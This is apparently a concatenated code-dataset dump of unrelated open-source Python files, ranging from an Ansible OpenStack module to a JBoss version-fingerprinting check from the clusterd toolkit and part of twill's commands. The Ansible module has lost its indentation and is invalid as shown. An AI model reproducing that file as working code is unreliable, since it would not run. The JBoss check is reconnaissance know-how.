# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
try:
import shade
from shade import meta
HAS_SHADE = True
except ImportError:
HAS_SHADE = False
DOCUMENTATION = '''
---
module: os_auth
short_description: Retrieve an auth token
version_added: "2.0"
description:
- Retrieve an auth token from an OpenStack Cloud
requirements:
- "python >= 2.6"
- "shade"
extends_documentation_fragment: openstack
'''
EXAMPLES = '''
# Authenticate to the cloud and retrieve the service catalog
- os_auth:
cloud: rax-dfw
- debug: var=service_catalog
'''
def main():
argument_spec = openstack_full_argument_spec()
module_kwargs = openstack_module_kwargs()
module = AnsibleModule(argument_spec, **module_kwargs)
if not HAS_SHADE:
module.fail_json(msg='shade is required for this module')
try:
cloud = shade.openstack_cloud(**module.params)
module.exit_json(
changed=False,
ansible_facts=dict(
auth_token=cloud.auth_token,
service_catalog=cloud.service_catalog))
except shade.OpenStackCloudException as e:
module.fail_json(msg=e.message)
# this is magic, see lib/ansible/module_common.py
from ansible.module_utils.basic import *
from ansible.module_utils.openstack import *
if __name__ == '__main__':
main()
| gpl-3.0 | -2,372,976,840,638,432,000 | 28.5 | 72 | 0.6999 | false |
DanMcInerney/clusterd | src/platform/jboss/fingerprints/JBoss51.py | 8 | 1534 | from src.platform.jboss.interfaces import JINTERFACES
from cprint import FingerPrint
from requests import exceptions
from log import LOG
import utility
class FPrint(FingerPrint):
def __init__(self):
self.platform = "jboss"
self.version = "5.1"
self.title = JINTERFACES.WM
self.uri = "/admin-console/login.seam"
self.port = 8080
self.hash = None
def check(self, ip, port=None):
"""
"""
try:
rport = self.port if port is None else port
request = utility.requests_get("http://{0}:{1}{2}".format(
ip, rport, self.uri))
# JBoss 5.1 and 6.0 share images, so we can't fingerprint those, but
# we can check the web server version and a lack of a 6 in the AS title
if "JBoss AS Administration Console 1.2.0" in request.content and \
"JBoss AS 6 Admin Console" not in request.content:
return True
except exceptions.Timeout:
utility.Msg("{0} timeout to {1}:{2}".format(self.platform,
ip, rport),
LOG.DEBUG)
except exceptions.ConnectionError:
utility.Msg("{0} connection error to {1}:{2}".format(self.platform,
ip, rport),
LOG.DEBUG)
return False
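    # Illustrative use (the host is a placeholder from the TEST-NET range):
    #
    #   fp = FPrint()
    #   if fp.check("192.0.2.10"):
    #       utility.Msg("JBoss 5.1 admin console detected")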
| mit | 1,282,200,764,707,094,000 | 36.414634 | 83 | 0.498696 | false |
Captain-Coder/tribler | Tribler/Core/Utilities/torrent_utils.py | 1 | 4775 | from __future__ import absolute_import
import logging
import os
import libtorrent
from six import text_type
logger = logging.getLogger(__name__)
def commonprefix(l):
    # Unlike os.path.commonprefix, this always returns a path prefix because it
    # compares the paths component-wise instead of character-wise.
cp = []
ls = [p.split('/') for p in l]
ml = min(len(p) for p in ls)
for i in range(ml):
s = set(p[i] for p in ls)
if len(s) != 1:
break
cp.append(s.pop())
return os.path.sep.join(cp)
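# Example (illustrative, POSIX-style paths):
#   commonprefix(['/data/t/a.txt', '/data/t/sub/b.txt']) == '/data/t'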
def create_torrent_file(file_path_list, params):
fs = libtorrent.file_storage()
# filter all non-files
file_path_list_filtered = []
for path in file_path_list:
if not os.path.exists(path):
raise IOError('Path does not exist: %s' % path)
elif os.path.isfile(path):
file_path_list_filtered.append(path)
# get the directory where these files are in. If there are multiple files, take the common directory they are in
if len(file_path_list_filtered) == 1:
base_path = os.path.split(file_path_list_filtered[0])[0]
else:
base_path = os.path.abspath(commonprefix(file_path_list_filtered))
# the base_dir directory is the parent directory of the base_path and is passed to the set_piece_hash method
base_dir = os.path.split(base_path)[0]
if len(file_path_list_filtered) == 1:
filename = os.path.basename(file_path_list_filtered[0])
fs.add_file(filename, os.path.getsize(file_path_list_filtered[0]))
else:
for full_file_path in file_path_list_filtered:
filename = os.path.join(base_path[len(base_dir) + 1:], full_file_path[len(base_dir):])[1:]
fs.add_file(filename, os.path.getsize(full_file_path))
if params.get('piece length'):
piece_size = params['piece length']
else:
piece_size = 0
flags = libtorrent.create_torrent_flags_t.optimize
# This flag doesn't exist anymore in libtorrent V1.1.0
if hasattr(libtorrent.create_torrent_flags_t, 'calculate_file_hashes'):
flags |= libtorrent.create_torrent_flags_t.calculate_file_hashes
torrent = libtorrent.create_torrent(fs, piece_size=piece_size, flags=flags)
if params.get('comment'):
torrent.set_comment(params['comment'])
if params.get('created by'):
torrent.set_creator(params['created by'])
# main tracker
if params.get('announce'):
torrent.add_tracker(params['announce'])
# tracker list
if params.get('announce-list'):
tier = 1
for tracker in params['announce-list']:
torrent.add_tracker(tracker, tier=tier)
tier += 1
# DHT nodes
# http://www.bittorrent.org/beps/bep_0005.html
if params.get('nodes'):
for node in params['nodes']:
torrent.add_node(*node)
# HTTP seeding
# http://www.bittorrent.org/beps/bep_0017.html
if params.get('httpseeds'):
torrent.add_http_seed(params['httpseeds'])
# Web seeding
# http://www.bittorrent.org/beps/bep_0019.html
if len(file_path_list) == 1:
if params.get('urllist', False):
torrent.add_url_seed(params['urllist'])
# read the files and calculate the hashes
if len(file_path_list) == 1:
libtorrent.set_piece_hashes(torrent, base_path)
else:
libtorrent.set_piece_hashes(torrent, base_dir)
t1 = torrent.generate()
torrent = libtorrent.bencode(t1)
postfix = u'.torrent'
if params.get('name'):
if not isinstance(params['name'], text_type):
params['name'] = unicode(params['name'], 'utf-8')
torrent_file_name = os.path.join(base_path, params['name'] + postfix)
else:
torrent_file_name = os.path.join(base_path, unicode(t1['info']['name'], 'utf-8') + postfix)
with open(torrent_file_name, 'wb') as f:
f.write(torrent)
return {'success': True,
'base_path': base_path,
'base_dir': base_dir,
'torrent_file_path': torrent_file_name}
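# Minimal usage sketch (illustrative only: the file path and tracker URL are
# made up, and libtorrent must be importable):
#
#   result = create_torrent_file([u'/tmp/demo/file.bin'],
#                                {'announce': 'http://tracker.example.org/announce',
#                                 'comment': 'demo torrent'})
#   print(result['torrent_file_path'])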
def get_info_from_handle(handle):
# In libtorrent 0.16.18, the torrent_handle.torrent_file method is not available.
# this method checks whether the torrent_file method is available on a given handle.
# If not, fall back on the deprecated get_torrent_info
try:
if hasattr(handle, 'torrent_file'):
return handle.torrent_file()
return handle.get_torrent_info()
except AttributeError as ae:
logger.warning("No torrent info found from handle: %s", str(ae))
return None
except RuntimeError as e: # This can happen when the torrent handle is invalid.
logger.warning("Got exception when fetching info from handle: %s", str(e))
return None
| lgpl-3.0 | 2,500,792,797,343,158,300 | 33.601449 | 116 | 0.633508 | false |
rbian/avocado-vt | virttest/libvirt_xml/nwfilter_protocols/icmp.py | 26 | 6074 | """
icmp protocol support class(es)
http://libvirt.org/formatnwfilter.html#nwfelemsRulesProtoICMP
"""
from virttest.libvirt_xml import accessors, xcepts
from virttest.libvirt_xml.nwfilter_protocols import base
class Icmp(base.TypedDeviceBase):
"""
Create new Icmp xml instances
Properties:
attrs: libvirt_xml.nwfilter_protocols.Icmp.Attr instance
"""
__slots__ = ('attrs',)
def __init__(self, type_name='file', virsh_instance=base.base.virsh):
accessors.XMLElementNest('attrs', self, parent_xpath='/',
tag_name='icmp', subclass=self.Attr,
subclass_dargs={
'virsh_instance': virsh_instance})
super(Icmp, self).__init__(protocol_tag='icmp', type_name=type_name,
virsh_instance=virsh_instance)
def new_attr(self, **dargs):
"""
Return a new Attr instance and set properties from dargs
:param dargs: dict of attributes
:return: new Attr instance
"""
new_one = self.Attr(virsh_instance=self.virsh)
for key, value in dargs.items():
setattr(new_one, key, value)
return new_one
def get_attr(self):
"""
Return icmp attribute dict
:return: None if no icmp in xml, dict of icmp's attributes.
"""
try:
icmp_node = self.xmltreefile.reroot('/icmp')
except KeyError, detail:
raise xcepts.LibvirtXMLError(detail)
node = icmp_node.getroot()
icmp_attr = dict(node.items())
return icmp_attr
class Attr(base.base.LibvirtXMLBase):
"""
Icmp attribute XML class
Properties:
srcmacaddr: string, MAC address of sender
srcmacmask: string, Mask applied to MAC address of sender
dstmacaddr: string, MAC address of destination
dstmacmask: string, Mask applied to MAC address of destination
srcipaddr: string, Source IP address
srcipmask: string, Mask applied to source IP address
dstipaddr: string, Destination IP address
dstipmask: string, Mask applied to destination IP address
srcipfrom: string, Start of range of source IP address
srcipto: string, End of range of source IP address
dstipfrom: string, Start of range of destination IP address
dstipto: string, End of range of destination IP address
type: string, ICMP type
code: string, ICMP code
comment: string, text with max. 256 characters
state: string, comma separated list of NEW,ESTABLISHED,RELATED,INVALID or NONE
ipset: The name of an IPSet managed outside of libvirt
ipsetflags: flags for the IPSet; requires ipset attribute
"""
__slots__ = ('srcmacaddr', 'srcmacmask', 'dstmacaddr', 'dstmacmask',
'srcipaddr', 'srcipmask', 'dstipaddr', 'dstipmask',
'srcipfrom', 'srcipto', 'dstipfrom', 'dstipto',
'type', 'code', 'dscp', 'comment', 'state', 'ipset',
'ipsetflags')
def __init__(self, virsh_instance=base.base.virsh):
accessors.XMLAttribute('srcmacaddr', self, parent_xpath='/',
tag_name='icmp', attribute='srcmacaddr')
accessors.XMLAttribute('srcmacmask', self, parent_xpath='/',
tag_name='icmp', attribute='srcmacmask')
accessors.XMLAttribute('dstmacaddr', self, parent_xpath='/',
tag_name='icmp', attribute='dstmacaddr')
accessors.XMLAttribute('dstmacmask', self, parent_xpath='/',
tag_name='icmp', attribute='dstmacmask')
accessors.XMLAttribute('srcipaddr', self, parent_xpath='/',
tag_name='icmp', attribute='srcipaddr')
accessors.XMLAttribute('srcipmask', self, parent_xpath='/',
tag_name='icmp', attribute='srcipmask')
accessors.XMLAttribute('dstipaddr', self, parent_xpath='/',
tag_name='icmp', attribute='dstipaddr')
accessors.XMLAttribute('dstipmask', self, parent_xpath='/',
tag_name='icmp', attribute='dstipmask')
accessors.XMLAttribute('srcipfrom', self, parent_xpath='/',
tag_name='icmp', attribute='srcipfrom')
accessors.XMLAttribute('srcipto', self, parent_xpath='/',
tag_name='icmp', attribute='srcipto')
accessors.XMLAttribute('dstipfrom', self, parent_xpath='/',
tag_name='icmp', attribute='dstipfrom')
accessors.XMLAttribute('dstipto', self, parent_xpath='/',
tag_name='icmp', attribute='dstipto')
accessors.XMLAttribute('type', self, parent_xpath='/',
tag_name='icmp', attribute='type')
accessors.XMLAttribute('code', self, parent_xpath='/',
tag_name='icmp', attribute='code')
accessors.XMLAttribute('dscp', self, parent_xpath='/',
tag_name='icmp', attribute='dscp')
accessors.XMLAttribute('comment', self, parent_xpath='/',
tag_name='icmp', attribute='comment')
accessors.XMLAttribute('state', self, parent_xpath='/',
tag_name='icmp', attribute='state')
accessors.XMLAttribute('ipset', self, parent_xpath='/',
tag_name='icmp', attribute='ipset')
accessors.XMLAttribute('ipsetflags', self, parent_xpath='/',
tag_name='icmp', attribute='ipsetflags')
super(self.__class__, self).__init__(virsh_instance=virsh_instance)
self.xml = '<icmp/>'
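# Illustrative construction (sketch only; the attribute values are arbitrary):
#
#   icmp = Icmp()
#   icmp.attrs = icmp.new_attr(srcipaddr='10.1.1.1', type='8', code='0')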
| gpl-2.0 | -716,273,272,941,290,800 | 45.366412 | 86 | 0.552519 | false |
valdecdev/asterisk360 | asterisk360/models/asterisk360.py | 2 | 4474 | __author__ = 'les'
from openerp.osv import orm, fields
from openerp.tools.translate import _
class asterisk_server(orm.Model):
_inherit = "asterisk.server"
_columns = {
'ws_address': fields.char('Asterisk WebSocket Server Full Address or DNS', size=150, help="Full URI of the WebSockets Server including port e.g ws://<ip>:<port>")
}
class res_users(orm.Model):
_inherit = "res.users"
_columns = {
'asterisk_chan_type': fields.selection([
('SIP', 'SIP'),
('IAX2', 'IAX2'),
('DAHDI', 'DAHDI'),
('Zap', 'Zap'),
('Skinny', 'Skinny'),
('MGCP', 'MGCP'),
('mISDN', 'mISDN'),
('H323', 'H323'),
('USTM', 'USTM'),
('SCCP', 'SCCP'),
('Local','Local')], 'Asterisk channel type', help="Asterisk channel type, as used in the Asterisk dialplan. If the user has a regular IP phone, the channel type is 'SIP'."),
'screen_pop': fields.boolean('Screen Pop', help="Check to enable screen pops for this user"),
#'screen_pop_form': fields.one2many('ir.actions')
'log_calls': fields.boolean('Log Calls', help="Log calls for this user")
}
class res_partner(orm.Model):
_inherit = "res.partner"
_columns = {
'call_ids': fields.one2many('crm.phonecall', 'partner_id', 'Calls'),
}
def _get_caller_name(self, details):
person = details['contact_name'] if 'contact_name' in details else False
partner = details['partner_name'] if 'partner_name' in details else False
if person:
if partner and len(partner)>0:
return '%s (%s)' % (person, partner)
return person
if partner: return partner
return 'Unknown'
def setup_call_inbound(self, cr, uid, number, extension, context=None):
details = {
'extension': extension,
}
res = self.get_partner_from_phone_number(cr, uid, number, context=context)
if res:
details['contact_id'] = res[0]
details['contact_name'] = res[2]
details['parent_id'] = res[1]
details['parent_name'] = '%s' % self.read(cr, uid, res[1],['name'])['name'] if res[1] else ""
# if we want to record the calls
details['openerp_call_id'] = self.create_inbound_call(cr, uid, details, number, context)
return details
def create_inbound_call(self, cr, uid, details, inbound_number, context):
inbound_category_id = self.pool.get('crm.case.categ').search(cr, uid, [('name', '=', 'Inbound')])
return self.create_call(cr, uid, details, inbound_number, inbound_category_id, context)
def create_call(self, cr, uid, details, number, category_id, context={}):
vals = {
'name': '%s %s' % (self._get_caller_name(details),_('Inbound')),
'partner_phone': number,
'categ_id': category_id[0],
}
if 'extension' in details:
user_obj = self.pool.get('res.users')
search_results = user_obj.search(cr, uid, [('internal_number','=',details['extension'])])
if len(search_results)>0:
vals['user_id'] = search_results[0]
ret = user_obj.read(cr, uid, vals['user_id'],['context_section_id','log_calls'])
if not ret['log_calls']: return
if 'context_section_id' in ret:
section_id = ret['context_section_id']
vals['section_id'] = section_id[0]
if 'contact_id' in details: vals['partner_id'] = details['contact_id']
call_object = self.pool.get('crm.phonecall')
if not context:
context={}
context['mail_create_nosubscribe'] = True
call_id = call_object.create(cr, uid, vals, context)
if 'user_id' in vals:
call_object.message_subscribe_users(cr, uid, [call_id], [vals['user_id']])
call_object.case_open(cr, uid, [call_id])
return call_id
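    # Illustrative flow (the number and extension are made up): an inbound call
    # from '+5511999990000' answered on extension '200' would be handled with
    #
    #   partner_obj.setup_call_inbound(cr, uid, '+5511999990000', '200')
    #
    # which resolves the caller to a partner and logs an inbound crm.phonecall
    # via create_inbound_call().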
| agpl-3.0 | 3,636,015,768,797,953,000 | 41.207547 | 224 | 0.506482 | false |
procangroup/edx-platform | lms/djangoapps/certificates/management/commands/regenerate_user.py | 15 | 5358 | """Django management command to force certificate regeneration for one user"""
import copy
import logging
from django.contrib.auth.models import User
from django.core.management.base import BaseCommand
from opaque_keys.edx.keys import CourseKey
from six import text_type
from badges.events.course_complete import get_completion_badge
from badges.utils import badges_enabled
from lms.djangoapps.certificates.api import regenerate_user_certificates
from xmodule.modulestore.django import modulestore
LOGGER = logging.getLogger(__name__)
class Command(BaseCommand):
"""
Management command to recreate the certificate for
a given user in a given course.
"""
help = """Put a request on the queue to recreate the certificate for a particular user in a particular course."""
def add_arguments(self, parser):
parser.add_argument('-n', '--noop',
action='store_true',
dest='noop',
help="Don't grade or add certificate requests to the queue")
parser.add_argument('--insecure',
action='store_true',
dest='insecure',
help="Don't use https for the callback url to the LMS, useful in http test environments")
parser.add_argument('-c', '--course',
metavar='COURSE_ID',
dest='course',
required=True,
help='The course id (e.g., mit/6-002x/circuits-and-electronics) for which the student '
'named in <username> should be graded')
parser.add_argument('-u', '--user',
metavar='USERNAME',
dest='username',
required=True,
help='The username or email address for whom grading and certification should be requested')
parser.add_argument('-G', '--grade',
metavar='GRADE',
dest='grade_value',
default=None,
help='The grade string, such as "Distinction", which is passed to the certificate agent')
parser.add_argument('-T', '--template',
metavar='TEMPLATE',
dest='template_file',
default=None,
help='The template file used to render this certificate, like "QMSE01-distinction.pdf"')
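    # Example invocation (illustrative; the course id and username are made up,
    # and the exact manage.py wrapper depends on the deployment):
    #
    #   ./manage.py lms regenerate_user \
    #       --course course-v1:edX+DemoX+Demo_2014 \
    #       --user [email protected] --insecure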
def handle(self, *args, **options):
# Scrub the username from the log message
cleaned_options = copy.copy(options)
if 'username' in cleaned_options:
cleaned_options['username'] = '<USERNAME>'
LOGGER.info(
(
u"Starting to create tasks to regenerate certificates "
u"with arguments %s and options %s"
),
text_type(args),
text_type(cleaned_options)
)
# try to parse out the course from the serialized form
course_id = CourseKey.from_string(options['course'])
user = options['username']
if '@' in user:
student = User.objects.get(email=user, courseenrollment__course_id=course_id)
else:
student = User.objects.get(username=user, courseenrollment__course_id=course_id)
course = modulestore().get_course(course_id, depth=2)
if not options['noop']:
LOGGER.info(
(
u"Adding task to the XQueue to generate a certificate "
u"for student %s in course '%s'."
),
student.id,
course_id
)
if badges_enabled() and course.issue_badges:
badge_class = get_completion_badge(course_id, student)
badge = badge_class.get_for_user(student)
if badge:
badge.delete()
LOGGER.info(u"Cleared badge for student %s.", student.id)
# Add the certificate request to the queue
ret = regenerate_user_certificates(
student, course_id, course=course,
forced_grade=options['grade_value'],
template_file=options['template_file'],
insecure=options['insecure']
)
LOGGER.info(
(
u"Added a certificate regeneration task to the XQueue "
u"for student %s in course '%s'. "
u"The new certificate status is '%s'."
),
student.id,
text_type(course_id),
ret
)
else:
LOGGER.info(
(
u"Skipping certificate generation for "
u"student %s in course '%s' "
u"because the noop flag is set."
),
student.id,
text_type(course_id)
)
LOGGER.info(
(
u"Finished regenerating certificates command for "
u"user %s and course '%s'."
),
student.id,
text_type(course_id)
)
| agpl-3.0 | -2,069,358,726,322,033,400 | 37.826087 | 120 | 0.513438 | false |
VaneCloud/horizon | openstack_dashboard/dashboards/project/volumes/snapshots/forms.py | 72 | 1841 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from openstack_dashboard.api import cinder
class UpdateForm(forms.SelfHandlingForm):
name = forms.CharField(max_length=255, label=_("Snapshot Name"))
description = forms.CharField(max_length=255,
widget=forms.Textarea(attrs={'rows': 4}),
label=_("Description"),
required=False)
def handle(self, request, data):
snapshot_id = self.initial['snapshot_id']
try:
cinder.volume_snapshot_update(request,
snapshot_id,
data['name'],
data['description'])
message = _('Updating volume snapshot "%s"') % data['name']
messages.info(request, message)
return True
except Exception:
redirect = reverse("horizon:project:volumes:index")
exceptions.handle(request,
_('Unable to update volume snapshot.'),
redirect=redirect)
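# Rough usage sketch (hypothetical request and snapshot id; the snapshot views
# normally instantiate this form for you):
#
#   form = UpdateForm(request, initial={'snapshot_id': snapshot_id},
#                     data={'name': 'nightly', 'description': 'pre-upgrade'})
#   if form.is_valid():
#       form.handle(request, form.cleaned_data)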
| apache-2.0 | -2,058,576,810,762,252,300 | 39.021739 | 75 | 0.603476 | false |
ganeti/ganeti | test/py/ganeti.storage.gluster_unittest.py | 1 | 7056 | #!/usr/bin/python3
#
# Copyright (C) 2013, 2016 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Script for unittesting the ganeti.storage.gluster module"""
import os
import shutil
import tempfile
import unittest
import mock
from ganeti import constants
from ganeti import errors
from ganeti.storage import gluster
from ganeti import ssconf
from ganeti import utils
import testutils
class TestGlusterVolume(testutils.GanetiTestCase):
testAddrIpv = {4: "203.0.113.42",
6: "2001:DB8::74:65:28:6:69",
}
@staticmethod
def _MakeVolume(addr=None, port=9001,
run_cmd=NotImplemented,
vol_name="pinky"):
addr = addr if addr is not None else TestGlusterVolume.testAddrIpv[4]
return gluster.GlusterVolume(addr, port, vol_name, _run_cmd=run_cmd,
_mount_point="/invalid")
def setUp(self):
testutils.GanetiTestCase.setUp(self)
# Create some volumes.
self.vol_a = TestGlusterVolume._MakeVolume()
self.vol_a_clone = TestGlusterVolume._MakeVolume()
self.vol_b = TestGlusterVolume._MakeVolume(vol_name="pinker")
def testEquality(self):
self.assertEqual(self.vol_a, self.vol_a_clone)
def testInequality(self):
self.assertNotEqual(self.vol_a, self.vol_b)
def testHostnameResolution(self):
vol_1 = TestGlusterVolume._MakeVolume(addr="localhost")
self.assertTrue(vol_1.server_ip in ["127.0.0.1", "::1"],
msg="%s not an IP of localhost" % (vol_1.server_ip,))
self.assertRaises(errors.ResolverError, lambda: \
TestGlusterVolume._MakeVolume(addr="E_NOENT"))
def testKVMMountStrings(self):
# The only source of documentation I can find is:
# https://github.com/qemu/qemu/commit/8d6d89c
# This test gets as close as possible to the examples given there,
# within the limits of our implementation (no transport specification,
# no default port version).
vol_1 = TestGlusterVolume._MakeVolume(addr=TestGlusterVolume.testAddrIpv[4],
port=24007,
vol_name="testvol")
self.assertEqual(
vol_1.GetKVMMountString("dir/a.img"),
"gluster://203.0.113.42:24007/testvol/dir/a.img"
)
vol_2 = TestGlusterVolume._MakeVolume(addr=TestGlusterVolume.testAddrIpv[6],
port=24007,
vol_name="testvol")
self.assertEqual(
vol_2.GetKVMMountString("dir/a.img"),
"gluster://[2001:db8:0:74:65:28:6:69]:24007/testvol/dir/a.img"
)
vol_3 = TestGlusterVolume._MakeVolume(addr="localhost",
port=9001,
vol_name="testvol")
kvmMountString = vol_3.GetKVMMountString("dir/a.img")
self.assertTrue(
kvmMountString in
["gluster://127.0.0.1:9001/testvol/dir/a.img",
"gluster://[::1]:9001/testvol/dir/a.img"],
msg="%s is not volume testvol/dir/a.img on localhost" % (kvmMountString,)
)
def testFUSEMountStrings(self):
vol_1 = TestGlusterVolume._MakeVolume(addr=TestGlusterVolume.testAddrIpv[4],
port=24007,
vol_name="testvol")
self.assertEqual(
vol_1._GetFUSEMountString(),
"-o server-port=24007 203.0.113.42:/testvol"
)
vol_2 = TestGlusterVolume._MakeVolume(addr=TestGlusterVolume.testAddrIpv[6],
port=24007,
vol_name="testvol")
# This _ought_ to work. https://bugzilla.redhat.com/show_bug.cgi?id=764188
self.assertEqual(
vol_2._GetFUSEMountString(),
"-o server-port=24007 2001:db8:0:74:65:28:6:69:/testvol"
)
vol_3 = TestGlusterVolume._MakeVolume(addr="localhost",
port=9001,
vol_name="testvol")
fuseMountString = vol_3._GetFUSEMountString()
self.assertTrue(fuseMountString in
["-o server-port=9001 127.0.0.1:/testvol",
"-o server-port=9001 ::1:/testvol"],
msg="%s not testvol on localhost:9001" % (fuseMountString,))
class TestGlusterStorage(testutils.GanetiTestCase):
def setUp(self):
"""Set up test data"""
testutils.GanetiTestCase.setUp(self)
self.test_params = {
constants.GLUSTER_HOST: "127.0.0.1",
constants.GLUSTER_PORT: "24007",
constants.GLUSTER_VOLUME: "/testvol"
}
self.test_unique_id = ("testdriver", "testpath")
@testutils.patch_object(gluster.FileDeviceHelper, "CreateFile")
@testutils.patch_object(gluster.GlusterVolume, "Mount")
@testutils.patch_object(ssconf.SimpleStore, "GetGlusterStorageDir")
@testutils.patch_object(gluster.GlusterStorage, "Attach")
def testCreate(self, attach_mock, storage_dir_mock,
mount_mock, create_file_mock):
attach_mock.return_value = True
storage_dir_mock.return_value = "/testmount"
expect = gluster.GlusterStorage(self.test_unique_id, [], 123,
self.test_params, {})
got = gluster.GlusterStorage.Create(self.test_unique_id, [], 123, None,
self.test_params, False, {},
test_kwarg="test")
self.assertEqual(expect, got)
def testCreateFailure(self):
self.assertRaises(errors.ProgrammerError, gluster.GlusterStorage.Create,
self.test_unique_id, [], 123, None,
self.test_params, True, {})
if __name__ == "__main__":
testutils.GanetiTestProgram()
| bsd-2-clause | -8,493,400,030,548,871,000 | 37.557377 | 80 | 0.629819 | false |
elego/tkobr-addons | tko_email_template_restrict_by_group/models/mail_template.py | 1 | 1160 | # -*- coding: utf-8 -*-
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
# Thinkopen - Brasil
# Copyright (C) Thinkopen Solutions (<http://www.thinkopensolutions.com.br>)
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from odoo import models, fields, api
class MailTemplate(models.Model):
"Templates for sending email"
_inherit = "mail.template"
group_ids = fields.Many2many('res.groups', 'mail_template_groups_rel', 'template_id', 'group_id', string='Groups')
template_user_ids = fields.Many2many('res.users', 'mail_template_user_ids_rel','template_id','user_id',compute='get_template_user_ids', string='Users',store=True)
@api.one
@api.depends('group_ids.users')
def get_template_user_ids(self):
user_ids = []
for group in self.group_ids:
for user in group.users:
if user.id not in user_ids:
user_ids.append(user.id)
if not self.group_ids:
user_ids = self.env['res.users'].search([('active','=',True)]).ids
self.template_user_ids = [(6, 0, user_ids)]
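        # Note: (6, 0, ids) is the Odoo ORM "replace" command for a
        # many2many field -- it overwrites the currently linked users with
        # exactly the records in `user_ids` in a single write.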
| agpl-3.0 | 2,005,225,474,380,050,700 | 37.666667 | 166 | 0.62931 | false |
jasrusable/fun | venv/lib/python2.7/site-packages/twill/commands.py | 19 | 23001 | """
Implementation of all of the individual 'twill' commands available through
twill-sh.
"""
import sys
import _mechanize_dist as mechanize
from _mechanize_dist import ClientForm
from _mechanize_dist._headersutil import is_html
OUT=None
ERR=sys.stderr
# export:
__all__ = ['get_browser',
'reset_browser',
'extend_with',
'exit',
'go',
'reload',
'url',
'code',
'follow',
'find',
'notfind',
'back',
'show',
'echo',
'save_html',
'sleep',
'agent',
'showforms',
'showlinks',
'showhistory',
'submit',
'formvalue',
'fv',
'formaction',
'fa',
'formclear',
'formfile',
'getinput',
'getpassword',
'save_cookies',
'load_cookies',
'clear_cookies',
'show_cookies',
'add_auth',
'run',
'runfile',
'setglobal',
'setlocal',
'debug',
'title',
'config',
'tidy_ok',
'redirect_output',
'reset_output',
'redirect_error',
'reset_error',
'add_extra_header',
'show_extra_headers',
'clear_extra_headers',
'info'
]
import re, getpass, time
from browser import TwillBrowser
from errors import TwillException, TwillAssertionError
import utils
from utils import set_form_control_value, run_tidy
from namespaces import get_twill_glocals
browser = TwillBrowser()
def get_browser():
return browser
def reset_browser():
"""
>> reset_browser
Reset the browser completely.
"""
global browser
browser._browser.close()
browser = TwillBrowser()
global _options
_options = {}
_options.update(_orig_options)
###
def exit(code="0"):
"""
exit [<code>]
Exits twill, with the given exit code (defaults to 0, "no error").
"""
raise SystemExit(int(code))
def go(url):
"""
>> go <url>
Visit the URL given.
"""
browser.go(url)
return browser.get_url()
def reload():
"""
>> reload
Reload the current URL.
"""
browser.reload()
return browser.get_url()
def code(should_be):
"""
>> code <int>
Check to make sure the response code for the last page is as given.
"""
should_be = int(should_be)
if browser.get_code() != int(should_be):
raise TwillAssertionError("code is %s != %s" % (browser.get_code(),
should_be))
def tidy_ok():
"""
>> tidy_ok
Assert that 'tidy' produces no warnings or errors when run on the current
page.
If 'tidy' cannot be run, will fail silently (unless 'tidy_should_exist'
option is true; see 'config' command).
"""
page = browser.get_html()
if page is None:
raise TwillAssertionError("not viewing HTML!")
(clean_page, errors) = run_tidy(page)
if clean_page is None: # tidy doesn't exist...
if _options.get('tidy_should_exist'):
raise TwillAssertionError("cannot run 'tidy'")
elif errors:
raise TwillAssertionError("tidy errors:\n====\n%s\n====\n" % (errors,))
# page is fine.
def url(should_be):
"""
>> url <regexp>
Check to make sure that the current URL matches the regexp. The local
variable __match__ is set to the matching part of the URL.
"""
regexp = re.compile(should_be)
current_url = browser.get_url()
m = None
if current_url is not None:
m = regexp.search(current_url)
else:
current_url = ''
if not m:
raise TwillAssertionError("""\
current url is '%s';
does not match '%s'
""" % (current_url, should_be,))
if m.groups():
match_str = m.group(1)
else:
match_str = m.group(0)
global_dict, local_dict = get_twill_glocals()
local_dict['__match__'] = match_str
return match_str
def follow(what):
"""
>> follow <regexp>
Find the first matching link on the page & visit it.
"""
regexp = re.compile(what)
link = browser.find_link(regexp)
if link:
browser.follow_link(link)
return browser.get_url()
raise TwillAssertionError("no links match to '%s'" % (what,))
